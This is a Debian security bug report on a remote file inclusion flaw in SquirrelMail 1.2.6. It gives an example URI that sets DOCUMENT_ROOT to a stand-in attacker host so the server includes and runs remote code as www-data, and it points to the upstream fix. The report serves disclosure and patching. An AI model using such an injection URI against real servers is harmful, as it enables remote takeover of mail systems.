Package: squirrelmail Version: 1:1.2.6-1.4 Severity: grave Justification: user security hole Tags: security
An attacker can attach DOCUMENT_ROOT to a SquirrelMail URI (eg, /src/redirect.php?DOCUMENT_ROOT=http://evil.example.com). If register_globals and allow_url_fopen are on (they are by default in the stable php4) then functions/display_message.php will include the attacker's script, allowing access as www-data. There is a fix in version 1.48.2.1 of display_message.php: http://cvs.sourceforge.net/viewcvs.py/squirrelmail/squirrelmail/functions/display_messages.php?r1=1.48&r2=1.48.2.1 -- System Information Debian Release: 3.0 Architecture: i386 Kernel: Linux okcomputer 2.4.29 #1 SMP Thu Jan 20 20:41:12 MST 2005 i686 Locale: LANG=en_CA, LC_CTYPE=en_CA Versions of packages squirrelmail depends on: ii apache 1.3.26-0woody6 Versatile, high-performance HTTP s ii aspell 0.33.7.1.1-9 A more intelligent replacement for ii debconf 1.2.35 Debian configuration management sy ii ispell 3.1.20-21.1 International Ispell (an interacti ii perl 5.6.1-8.8 Larry Wall's Practical Extraction ii php4 4:4.1.2-7.0.1 A server-side, HTML-embedded scrip ii wwwconfig-common 0.0.19 Debian web auto configuration. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
